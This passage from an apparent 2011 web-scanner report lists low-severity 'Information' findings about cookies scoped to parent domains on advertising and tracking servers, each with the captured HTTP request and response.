Expires: Thu, 01 Jan 1970 00:00:01 GMT
Cache-Control: no-cache, no-store
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/javascript;charset=UTF-8
Content-Length: 3919
Date: Mon, 25 Apr 2011 14:20:48 GMT

_289669_amg_acamp_id=166308;
_289669_amg_pcamp_id=69112;
_289669_amg_location_id=55365;
_289669_amg_creative_id=289669;
_289669_amg_loaded=true;
var _amg_289669_content='<script type="text/javascript"
...[SNIP]...
16.10. http://ad.trafficmp.com/a/bpix  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.trafficmp.com
Path:   /a/bpix

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /a/bpix?adv=652&id=1005&r= HTTP/1.1
Host: ad.trafficmp.com
Proxy-Connection: keep-alive
Referer: http://pixel.fetchback.com/serve/fb/pdc?cat=&name=landing&sid=719
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid2=470fb0bcf-3fea-4322-beeb-57f5828c5936-gmr873a3; T_6t2z=eo7%3A85fc%3A1; rth=2-ljzkpb-eo7~85fc~1~1-dlx~6ot5~1~1-7p9~0~1~1-

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: image/gif
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Date: Mon, 25 Apr 2011 15:21:08 GMT
Connection: close
Set-Cookie: T_6t2z=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_4ptz=eo7%3A879x%3A1; Domain=trafficmp.com; Expires=Tue, 24-Apr-2012 15:21:08 GMT; Path=/
Set-Cookie: rth=2-ljzkpb-eo7~879x~1~1-dlx~6ot5~1~1-7p9~0~1~1-; Domain=trafficmp.com; Expires=Tue, 24-Apr-2012 15:21:08 GMT; Path=/
Content-Length: 43

GIF89a.............!.......,...........D..;
16.11. http://ad.trafficmp.com/a/bpix  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.trafficmp.com
Path:   /a/bpix

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /a/bpix?adv=652&id=1005&r= HTTP/1.1
Host: ad.trafficmp.com
Proxy-Connection: keep-alive
Referer: http://pixel.fetchback.com/serve/fb/pdc?cat=&name=landing&sid=719
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid2=470fb0bcf-3fea-4322-beeb-57f5828c5936-gmr873a3; T_6sn9=dlx%3A6ot5%3A1; rth=2-ljzkpb-dlx~6ot5~1~1-7p9~0~1~1-

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: image/gif
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Date: Mon, 25 Apr 2011 15:14:01 GMT
Connection: close
Set-Cookie: T_6sn9=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_4uej=eo7%3A86y3%3A1; Domain=trafficmp.com; Expires=Tue, 24-Apr-2012 15:14:02 GMT; Path=/
Set-Cookie: rth=2-ljzkpb-eo7~86y3~1~1-dlx~6ot5~1~1-7p9~0~1~1-; Domain=trafficmp.com; Expires=Tue, 24-Apr-2012 15:14:02 GMT; Path=/
Content-Length: 43

GIF89a.............!.......,...........D..;
16.12. http://ad.trafficmp.com/a/bpix  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.trafficmp.com
Path:   /a/bpix

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /a/bpix?adv=652&id=1005&r= HTTP/1.1
Host: ad.trafficmp.com
Proxy-Connection: keep-alive
Referer: http://pixel.fetchback.com/serve/fb/pdc?cat=&name=landing&sid=719
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid2=470fb0bcf-3fea-4322-beeb-57f5828c5936-gmr873a3; T_9xbg=eo7%3A85ej%3A1; rth=2-ljzkpb-eo7~85ej~1~1-dlx~6ot5~1~1-7p9~0~1~1-

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: image/gif
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Date: Mon, 25 Apr 2011 15:14:11 GMT
Connection: close
Set-Cookie: T_9xbg=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_3evi=eo7%3A86yc%3A1; Domain=trafficmp.com; Expires=Tue, 24-Apr-2012 15:14:11 GMT; Path=/
Set-Cookie: rth=2-ljzkpb-eo7~86yc~1~1-dlx~6ot5~1~1-7p9~0~1~1-; Domain=trafficmp.com; Expires=Tue, 24-Apr-2012 15:14:11 GMT; Path=/
Content-Length: 43

GIF89a.............!.......,...........D..;
16.13. http://ar.voicefive.com/b/wc_beacon.pli  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /b/wc_beacon.pli

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/wc_beacon.pli?n=BMX_G&d=0&v=method-%3E-1,ts-%3E1303741228.986,wait-%3E10000,&1303741240885 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-1134822682510879&output=html&h=600&slotname=3061072279&w=160&lmt=1303759227&flash=10.2.154&url=http%3A%2F%2Fgames.webalta.ru%2F&dt=1303741227549&bpp=5&shv=r20110420&jsv=r20110415&correlator=1303741227571&frm=0&adk=1110337129&ga_vid=973557293.1303741228&ga_sid=1303741228&ga_hid=154889240&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1125&bih=929&fu=0&ifi=1&dtd=35&xpc=naYdoqC7iz&p=http%3A//games.webalta.ru
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; ar_p90175839=exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&; ar_p81479006=exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&; ar_s_p81479006=1; ar_p97174789=exp=22&initExp=Sun Apr 24 12:09:48 2011&recExp=Mon Apr 25 14:20:21 2011&prad=253732016&arc=181106347&; BMX_G=method->-1,ts->1303741221; BMX_3PC=1; UID=875e3f1e-184.84.247.65-1303349046

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 25 Apr 2011 14:24:25 GMT
Content-Type: image/gif
Connection: close
Vary: Accept-Encoding
Set-Cookie: BMX_G=method%2D%3E%2D1%2Cts%2D%3E1303741228%2E986%2Cwait%2D%3E10000%2C; path=/; domain=.voicefive.com;
Content-length: 42
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent

GIF89a.............!.......,........@..D.;
16.14. http://ar.voicefive.com/bmx3/broker.pli  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /bmx3/broker.pli?pid=p97174789&PRAd=253732016&AR_C=181106347 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-1134822682510879&output=html&h=600&slotname=3061072279&w=160&lmt=1303759227&flash=10.2.154&url=http%3A%2F%2Fgames.webalta.ru%2F&dt=1303741227549&bpp=5&shv=r20110420&jsv=r20110415&correlator=1303741227571&frm=0&adk=1110337129&ga_vid=973557293.1303741228&ga_sid=1303741228&ga_hid=154889240&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1125&bih=929&fu=0&ifi=1&dtd=35&xpc=naYdoqC7iz&p=http%3A//games.webalta.ru
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; ar_p90175839=exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&; ar_p97174789=exp=21&initExp=Sun Apr 24 12:09:48 2011&recExp=Sun Apr 24 16:50:29 2011&prad=253732016&arc=186884742&; ar_p81479006=exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&; ar_s_p81479006=1; UID=875e3f1e-184.84.247.65-1303349046

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 25 Apr 2011 14:23:23 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p97174789=exp=22&initExp=Sun Apr 24 12:09:48 2011&recExp=Mon Apr 25 14:23:23 2011&prad=253732016&arc=181106347&; expires=Sun 24-Jul-2011 14:23:23 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_G=method->-1,ts->1303741403; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 25091

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"253732016",Pid:"p97174789",Arc:"181106347",Location:
...[SNIP]...
16.15. http://b.scorecardresearch.com/b  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /b

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b?C1=8&C2=6035824&C3=1271511541440207100&C4=&C5=&C6= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://games.mochiads.com/c/g/moon-volley/mvolley.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=25894b9d-24.143.206.177-1303083414

Response

HTTP/1.1 204 No Content
Content-Length: 0
Date: Mon, 25 Apr 2011 14:22:00 GMT
Connection: close
Set-Cookie: UID=25894b9d-24.143.206.177-1303083414; expires=Wed, 24-Apr-2013 14:22:00 GMT; path=/; domain=.scorecardresearch.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Pragma: no-cache
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
Server: CS

16.16. http://b.scorecardresearch.com/p  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /p

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /p?c1=8&c2=6035179&c3=1&c4=69113&c5=166308&c6=&cv=1.3&cj=1&rn=88302011 HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-1134822682510879&output=html&h=600&slotname=3061072279&w=160&lmt=1303759227&flash=10.2.154&url=http%3A%2F%2Fgames.webalta.ru%2F&dt=1303741227549&bpp=5&shv=r20110420&jsv=r20110415&correlator=1303741227571&frm=0&adk=1110337129&ga_vid=973557293.1303741228&ga_sid=1303741228&ga_hid=154889240&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1125&bih=929&fu=0&ifi=1&dtd=35&xpc=naYdoqC7iz&p=http%3A//games.webalta.ru
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=25894b9d-24.143.206.177-1303083414

Response

HTTP/1.1 200 OK
Content-Length: 43
Content-Type: image/gif
Date: Mon, 25 Apr 2011 14:20:21 GMT
Connection: close
Set-Cookie: UID=25894b9d-24.143.206.177-1303083414; expires=Wed, 24-Apr-2013 14:20:21 GMT; path=/; domain=.scorecardresearch.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Pragma: no-cache
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
Server: CS

GIF89a.............!.......,...........D..;
16.17. http://b.voicefive.com/b  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.voicefive.com
Path:   /b

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b?c1=4&c2=p97174789&c3=253732016&c4=181106347&c5=1&c6=22&c7=sun%20apr%2024%2012%3A09%3A48%202011&c8=http%3A%2F%2Fgoogleads.g.doubleclick.net%2Fpagead%2Fads%3Fclient%3Dca-pub-1134822682510879%26output%3Dhtml%26h%3D600%26slotname%3D3061072279%26w%3D160%26lmt%3D1303759227%26flash%3D10.2.154%26url%3Dhttp%253A%252F%252Fgames.webalta.ru%252F%26dt%3D1303741227549%26bpp%3D5%26shv%3Dr20110420%26jsv%3Dr20110415%26correlator%3D1303741227571%26frm%3D0%26adk%3D1110337129%26ga_vid%3D973557293.1303741228%26ga_sid%3D1303741228%26ga_hid%3D154889240%26ga_fc%3D0%26u_tz%3D-300%26u_his%3D1%26u_java%3D1%26u_h%3D1200%26u_w%3D1920%26u_ah%3D1156%26u_aw%3D1920%26u_cd%3D16%26u_nplug%3D9%26u_nmime%3D44%26biw%3D1125%26bih%3D929%26fu%3D0%26ifi%3D1%26dtd%3D35%26xpc%3DnaYdoqC7iz%26p%3Dhttp%253A%2F%2Fgames.webalta.ru&c9=&c10=&c15=&1303741232904 HTTP/1.1
Host: b.voicefive.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-1134822682510879&output=html&h=600&slotname=3061072279&w=160&lmt=1303759227&flash=10.2.154&url=http%3A%2F%2Fgames.webalta.ru%2F&dt=1303741227549&bpp=5&shv=r20110420&jsv=r20110415&correlator=1303741227571&frm=0&adk=1110337129&ga_vid=973557293.1303741228&ga_sid=1303741228&ga_hid=154889240&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1125&bih=929&fu=0&ifi=1&dtd=35&xpc=naYdoqC7iz&p=http%3A//games.webalta.ru
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; ar_p90175839=exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&; ar_p81479006=exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&; ar_s_p81479006=1; UID=875e3f1e-184.84.247.65-1303349046; ar_p97174789=exp=22&initExp=Sun Apr 24 12:09:48 2011&recExp=Mon Apr 25 14:20:21 2011&prad=253732016&arc=181106347&; BMX_G=method->-1,ts->1303741221; BMX_3PC=1

Response

HTTP/1.1 204 No Content
Content-Length: 0
Date: Mon, 25 Apr 2011 14:23:30 GMT
Connection: close
Set-Cookie: UID=875e3f1e-184.84.247.65-1303349046; expires=Wed, 24-Apr-2013 14:23:30 GMT; path=/; domain=.voicefive.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Pragma: no-cache
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
Server: CS

16.18. http://bs.mail.ru/count/108pZT9La4K40X00Zh4NwAO4M7sL0vi1R5aYYAZZY0AIgOvc0ue1aRpGIMG6auKDYm51VmG0,bs.mail.ru,1981869761303741204  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bs.mail.ru
Path:   /count/108pZT9La4K40X00Zh4NwAO4M7sL0vi1R5aYYAZZY0AIgOvc0ue1aRpGIMG6auKDYm51VmG0,bs.mail.ru,1981869761303741204

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /count/108pZT9La4K40X00Zh4NwAO4M7sL0vi1R5aYYAZZY0AIgOvc0ue1aRpGIMG6auKDYm51VmG0,bs.mail.ru,1981869761303741204?67253133 HTTP/1.1
Host: bs.mail.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoFACDL8gAAdDQMfV4MAQAIEwAIeWwM; p=6PMGAE2r7QAA; VID=2Tinlz3w7bGs

Response

HTTP/1.1 302 Found
Date: Mon, 25 Apr 2011 14:32:03 GMT
Server: Phantom/0.0.0
P3P: CP="NOI DEVa TAIa OUR BUS UNI STA"
Last-Modified: Mon, 25 Apr 2011 14:32:03 GMT
Expires: Mon, 25 Apr 2011 14:32:03 GMT
Cache-Control: private, no-cache, no-store, must-revalidate, max-age=0
Pragma: no-cache
Location: http://bs.mail.ru/count/108pZT9La4K40n00Zh4NwAO4M7sL0vi1R5aYYAZZY0AIgOvc0ue1aRpGIMG6auKDYm51VmG0,bs.mail.ru,1981869761303741204?67253133
Set-Cookie: searchuid=1981869761303741204; domain=.mail.ru; path=/; expires=Thu, 22-Apr-2021 14:32:03 GMT
Content-Length: 0

16.19. http://core1.node15.top.mail.ru/counter  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://core1.node15.top.mail.ru
Path:   /counter

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /counter?id=1446197;t=69;js=13;r=;j=true;s=1920*1200;d=16;rand=0.06563902948983014 HTTP/1.1
Host: core1.node15.top.mail.ru
Proxy-Connection: keep-alive
Referer: http://www.trucklist.ru/cars/trucks?utm_source=y_direct&utm_medium=cpc&utm_campaign=truck&_openstat=ZGlyZWN0LnlhbmRleC5ydTsxNzg5NDA3OzUzNzQ4MDA7eWFuZGV4LnJ1Omd1YXJhbnRlZQ
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoFACDL8gAAdDQMfV4MAQAIEwAIeWwM; searchuid=1981869761303741204; VID=2Tinlz3w7bGs; p=NOIGAEqT7AAA

Response

HTTP/1.1 200 OK
Server: wz/1.4
Date: Mon, 25 Apr 2011 14:47:44 GMT
Content-Type: image/gif
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CUR PSA OUR NOR"
Set-Cookie: VID=2Tinlz3w7bGs; path=/; expires=Tue, 26 Jul 2011 14:47:44 GMT; domain=.mail.ru
Cache-control: no-store, no-cache, must-revalidate
Pragma: no-cache
Content-Length: 885
Connection: close

GIF87a&...................................................................................................dddLLL......ppp...~~~.........ZZZyyymmm..............................???888...iii......PPP....
...[SNIP]...
16.20. http://core1.node15.top.mail.ru/counter  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://core1.node15.top.mail.ru
Path:   /counter

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /counter?id=1446197;t=69;js=13;r=;j=true;s=1920*1200;d=16;rand=0.7879115420024838 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: core1.node15.top.mail.ru

Response

HTTP/1.1 200 OK
Server: wz/1.4
Date: Mon, 25 Apr 2011 15:28:24 GMT
Content-Type: image/gif
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CUR PSA OUR NOR"
Set-Cookie: FTID=2jmTRp3gv_ms:1303745304:1446197:::; path=/; expires=Tue, 26 Jul 2011 15:28:24 GMT; domain=.mail.ru
Cache-control: no-store, no-cache, must-revalidate
Pragma: no-cache
Content-Length: 885
Connection: close

GIF87a&...................................................................................................dddLLL......ppp...~~~.........ZZZyyymmm..............................???888...iii......PPP....
...[SNIP]...
16.21. http://core2.node12.top.mail.ru/counter  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://core2.node12.top.mail.ru
Path:   /counter

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /counter?id=1301840;t=234;js=13;r=;j=true;s=1920*1200;d=16;rand=0.6505313029047102 HTTP/1.1
Host: core2.node12.top.mail.ru
Proxy-Connection: keep-alive
Referer: http://www.marketgid.com/pnews/773204/i/7269/pp/2/1/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoFACDL8gAAdDQMfV4MAQAIEwAIeWwM; VID=2Tinlz3w7bGs; searchuid=1981869761303741204; p=pPUGAEqlaAAA

Response

HTTP/1.1 200 OK
Server: wz/1.4
Date: Mon, 25 Apr 2011 14:39:51 GMT
Content-Type: image/gif
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CUR PSA OUR NOR"
Set-Cookie: VID=2Tinlz3w7bGs; path=/; expires=Tue, 26 Jul 2011 14:39:51 GMT; domain=.mail.ru
Cache-control: no-store, no-cache, must-revalidate
Pragma: no-cache
Content-Length: 1027
Connection: close

GIF87aX....../e&...*Y!......JsCmmm..........MSN.E.,.......,=....-`$...Aj$...Te..d. D................v.tDUB.~.,....X.......".di.(.....Z*..b.x....q..k#...<...l:....9Hx..A.q.L.`.B..L...dQ..lmf.....]-..3
...[SNIP]...
16.22. http://counter.rambler.ru/top100.cnt  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://counter.rambler.ru
Path:   /top100.cnt

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /top100.cnt?1433420 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: counter.rambler.ru

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 15:28:13 GMT
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Pragma: no-cache
Cache-Control: no-cache
Content-type: image/gif
P3P: policyref="/w3c/p3p.xml", CP="NON ADM DEV TAI PSA PSD IVA OUR IND UNI COM NAV INT"
Set-Cookie: ruid=TMALBg2TtU2U+QAAAUABRQ==; path=/; domain=.rambler.ru; expires=Thu, 22-Apr-21 15:28:13 GMT

GIF89a...................!.......,...........T..;
16.23. http://counter.yadro.ru/hit  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://counter.yadro.ru
Path:   /hit

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /hit?t44.1;r;s1920*1200*16;uabout%3Ablank;0.001672729670570472 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: counter.yadro.ru

Response

HTTP/1.1 302 Moved Temporarily
Date: Mon, 25 Apr 2011 15:27:54 GMT
Server: 0W/0.8c
Content-Type: text/html
Location: http://counter.yadro.ru/hit?q;t44.1;r;s1920*1200*16;uabout%3Ablank;0.001672729670570472
Content-Length: 32
Expires: Sat, 24 Apr 2010 20:00:00 GMT
Pragma: no-cache
Cache-control: no-cache
P3P: policyref="/w3c/p3p.xml", CP="UNI"
Set-Cookie: FTID=1DjPBw3bKUms; path=/; expires=Mon, 23 Apr 2012 20:00:00 GMT; domain=.yadro.ru

<html><body>Moved</body></html>
16.24. http://d7.zedo.com/img/bh.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /img/bh.gif

Issue detail

